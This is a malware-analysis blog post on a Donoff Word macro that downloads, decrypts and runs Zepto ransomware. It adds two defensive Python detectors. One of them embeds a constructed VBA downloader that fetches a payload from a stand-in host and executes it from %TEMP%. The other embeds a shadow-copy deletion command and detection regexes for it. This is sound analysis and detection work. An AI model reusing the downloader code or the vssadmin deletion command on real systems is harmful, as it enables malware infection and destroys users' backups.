Recently, we’ve spotted Zepto ransomware spreading through spam email carrying fake invoices (see image below). The attachment is a macro-enabled Word document, detected as Donoff, which downloads the Zepto executable; Zepto then encrypts the user's files and demands payment for the decryption key.
We decided to take a closer look at the Donoff macro used to download the Zepto ransomware. Here’s what we found:
The VBA Macro code
At first glance, the code is fully commented in Spanish and uses randomly generated variable names.
Here’s a look at the code:
The Word document contains two macro functions, autoopen (which Word runs automatically when the document is opened) and ActualizarEntrada.
Here are more snippets of code showing how the obfuscated text is processed.
These are the strings revealed after deobfuscation.
This VBA script uses the Microsoft.XMLHTTP and ADODB.Stream objects to download Zepto.
The Microsoft.XMLHTTP object is one of Microsoft’s XML DOM (Document Object Model) modules, intended to give client-side access to XML documents on remote servers over HTTP. In practice it can request or send any type of document, which is what makes it useful to a downloader.
The ADODB.Stream object is used to read, write and manage a stream of binary data or text, and here it writes the downloaded bytes to disk.
The following code decrypts to
Here’s the code that downloads the encrypted Zepto executable file.
The encrypted file is written to the file system as TempWFDSAdrweg. The macro then uses the key Aw3WSr7dB3RlPpLVmGVTtXcQ3WG8kQym to decrypt it and writes the decrypted binary to sysdrubpas.exe in the %temp% folder, which is usually C:\Users\<username>\AppData\Local\Temp.
Encrypted Zepto (displayed here in hexadecimal):
Decrypted Zepto (now in executable form):
The script then executes sysdrubpas.exe, infecting the user's system.
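The chain described above (an auto-exec entry point, an HTTP object, a binary stream object, a write under %TEMP%, then execution) is a compact signature for macro downloaders of this kind. The script below is an added example, not code from the original post or from ThreatTrack: it scores extracted VBA source against those indicators. The VBA fragment it scans is constructed to mirror the behaviour described here (the variable names, the URL and the weights are assumptions), and the thresholds in verdict() are this example's choice, not a vendor scale.

```python
import re
from collections import namedtuple

# Constructed VBA fragment modelled on the behaviour described in the post:
# an auto-exec entry point, Microsoft.XMLHTTP download, ADODB.Stream write
# to %TEMP%, then execution. It is not the Donoff macro and the URL is fake.
SAMPLE_VBA = r'''
Sub autoopen()
    ' se ejecuta automaticamente al abrir el documento
    ActualizarEntrada
End Sub

Sub ActualizarEntrada()
    Dim qzx As Object, wpl As Object
    Set qzx = CreateObject("Microsoft.XMLHTTP")
    Set wpl = CreateObject("Adodb.Stream")
    qzx.Open "GET", "http://example.invalid/payload.bin", False
    qzx.Send
    wpl.Open
    wpl.Type = 1
    wpl.Write qzx.responseBody
    wpl.SaveToFile Environ("TEMP") & "\TempWFDSAdrweg", 2
    Shell Environ("TEMP") & "\sysdrubpas.exe", vbHide
End Sub
'''

# Constructed benign macro for comparison.
BENIGN_VBA = r'''
Sub FormatFirstTable()
    ActiveDocument.Tables(1).Borders.Enable = True
End Sub
'''

# Indicator name, case-insensitive regex, and weight. Weights are an
# assumption chosen for this example, not a vendor scoring scale.
Indicator = namedtuple("Indicator", "name pattern weight")
INDICATORS = [
    Indicator("auto-exec entry point",
              r'\b(AutoOpen|Auto_Open|Document_Open|AutoExec|Workbook_Open)\b', 2),
    Indicator("HTTP client object",
              r'CreateObject\(\s*"(Microsoft\.XMLHTTP|MSXML2\.(Server)?XMLHTTP[\w.]*|WinHttp\.WinHttpRequest[\w.]*)"', 3),
    Indicator("binary stream object", r'CreateObject\(\s*"ADODB\.Stream"', 3),
    Indicator("file written to disk", r'\.SaveToFile\b', 2),
    Indicator("path under %TEMP%", r'Environ\(\s*"TEMP"\s*\)', 1),
    Indicator("process execution", r'\b(Shell|ShellExecute|WScript\.Shell)\b', 3),
]


def triage_vba(source):
    """Score a VBA source text and list the indicator names it matched."""
    hits, score = [], 0
    for ind in INDICATORS:
        if re.search(ind.pattern, source, re.IGNORECASE):
            hits.append(ind.name)
            score += ind.weight
    return score, hits


def verdict(score):
    """Map a score to a triage label (thresholds are this example's assumption)."""
    if score >= 8:
        return "likely downloader"
    if score >= 4:
        return "suspicious"
    return "low"


if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_VBA), ("benign", BENIGN_VBA)):
        score, hits = triage_vba(src)
        print(f"{label}: score={score} verdict={verdict(score)} hits={hits}")
```

In practice the macro source would first be pulled out of the .doc with a tool such as oletools' olevba; the scanner only sees the download-and-run pattern once the string obfuscation shown above has been undone, so it is a triage aid for analysts and mail-gateway rules, not a substitute for sandboxing.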
ThreatAnalyzer – Malware Sandbox Analysis
When the malicious Word document is executed in our malware analysis sandbox ThreatAnalyzer, this is the process tree it produces:
One notable behavior common to ransomware is deleting the Volume Shadow Copies, which prevents easy restoration from Windows backups.
Other behaviors are very similar to those in our previous post about Zepto ransomware: https://blog.threattrack.com/ransomware-packed-into-wsf-spam/.
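The process tree and the shadow-copy deletion above are the two host-side signals a defender can alert on. The following is an added example, not code from the post or from ThreatAnalyzer: it runs two simple rules over constructed process-creation records (an Office application spawning an executable from %TEMP%, and a shadow-copy deletion command) and then links the two. The log format is a made-up key=value form rather than real Sysmon or 4688 output, and the exact vssadmin command line is an assumption, since the post only states that shadow copies are deleted.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    ts: str
    parent: str
    image: str
    cmdline: str


# Constructed process-creation records in a simple key=value form (not real
# Sysmon or 4688 output). The first two lines mirror the chain in the post:
# WINWORD.EXE starts sysdrubpas.exe from %TEMP%, which then removes shadow
# copies. The vssadmin command line is an assumption for this example.
SAMPLE_LOG = r'''
2016-07-20T10:01:58Z parent=C:\Program Files\Microsoft Office\Office14\WINWORD.EXE image=C:\Users\alice\AppData\Local\Temp\sysdrubpas.exe cmdline="C:\Users\alice\AppData\Local\Temp\sysdrubpas.exe"
2016-07-20T10:02:03Z parent=C:\Users\alice\AppData\Local\Temp\sysdrubpas.exe image=C:\Windows\System32\vssadmin.exe cmdline="vssadmin.exe delete shadows /all /quiet"
2016-07-20T10:05:40Z parent=C:\Windows\explorer.exe image=C:\Windows\System32\notepad.exe cmdline="notepad.exe notes.txt"
'''

LINE_RE = re.compile(r'^(\S+) parent=(.+?) image=(.+?) cmdline="(.*)"$')


def parse_log(text):
    """Parse the constructed key=value records into ProcEvent objects."""
    events = []
    for line in text.strip().splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append(ProcEvent(*m.groups()))
    return events


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
TEMP_DIR = re.compile(r'\\AppData\\Local\\Temp\\', re.IGNORECASE)
SHADOW_DELETE = [
    re.compile(r'\bvssadmin(\.exe)?\b.*\bdelete\b.*\bshadows\b', re.IGNORECASE),
    re.compile(r'\bwmic(\.exe)?\b.*\bshadowcopy\b.*\bdelete\b', re.IGNORECASE),
]
SHADOW_TOOLS = {"vssadmin.exe", "wmic.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (timestamp, rule, detail) tuples for the two behaviours."""
    alerts = []
    for ev in events:
        if basename(ev.parent) in OFFICE_APPS and TEMP_DIR.search(ev.image):
            alerts.append((ev.ts, "office-app-spawned-temp-exe", ev.image))
        if basename(ev.image) in SHADOW_TOOLS and \
                any(p.search(ev.cmdline) for p in SHADOW_DELETE):
            alerts.append((ev.ts, "shadow-copy-deletion", ev.cmdline))
    return alerts


def linked_chain(events, alerts):
    """Shadow-copy tool launches whose parent is an Office-spawned %TEMP% exe."""
    spawned = {a[2].lower() for a in alerts if a[1] == "office-app-spawned-temp-exe"}
    return [ev for ev in events
            if basename(ev.image) in SHADOW_TOOLS and ev.parent.lower() in spawned]


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    found = detect(evs)
    for a in found:
        print(a)
    print("linked to Office parent:", len(linked_chain(evs, found)))
```

Either rule on its own is worth an alert; the link between them (a %TEMP% executable started by Word that goes on to delete shadow copies) is the high-confidence version, and it fires before the encryption finishes, which is the point at which a shadow-copy-based recovery still works.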
Prevent Ransomware Infections?
To prevent ransomware, we recommend blocking it early, at the root of its infection chain. Here are some tips:
e98aee56175daaa96f259d04077d820f – malicious DOC attachment (Trojan-Downloader.O97M.Donoff.by (v))
837a5b0dbd5850634bfecadadc751cdd – Zepto executable (Trojan.Win32.Generic!BT)
Analysis by Wilmina Elizon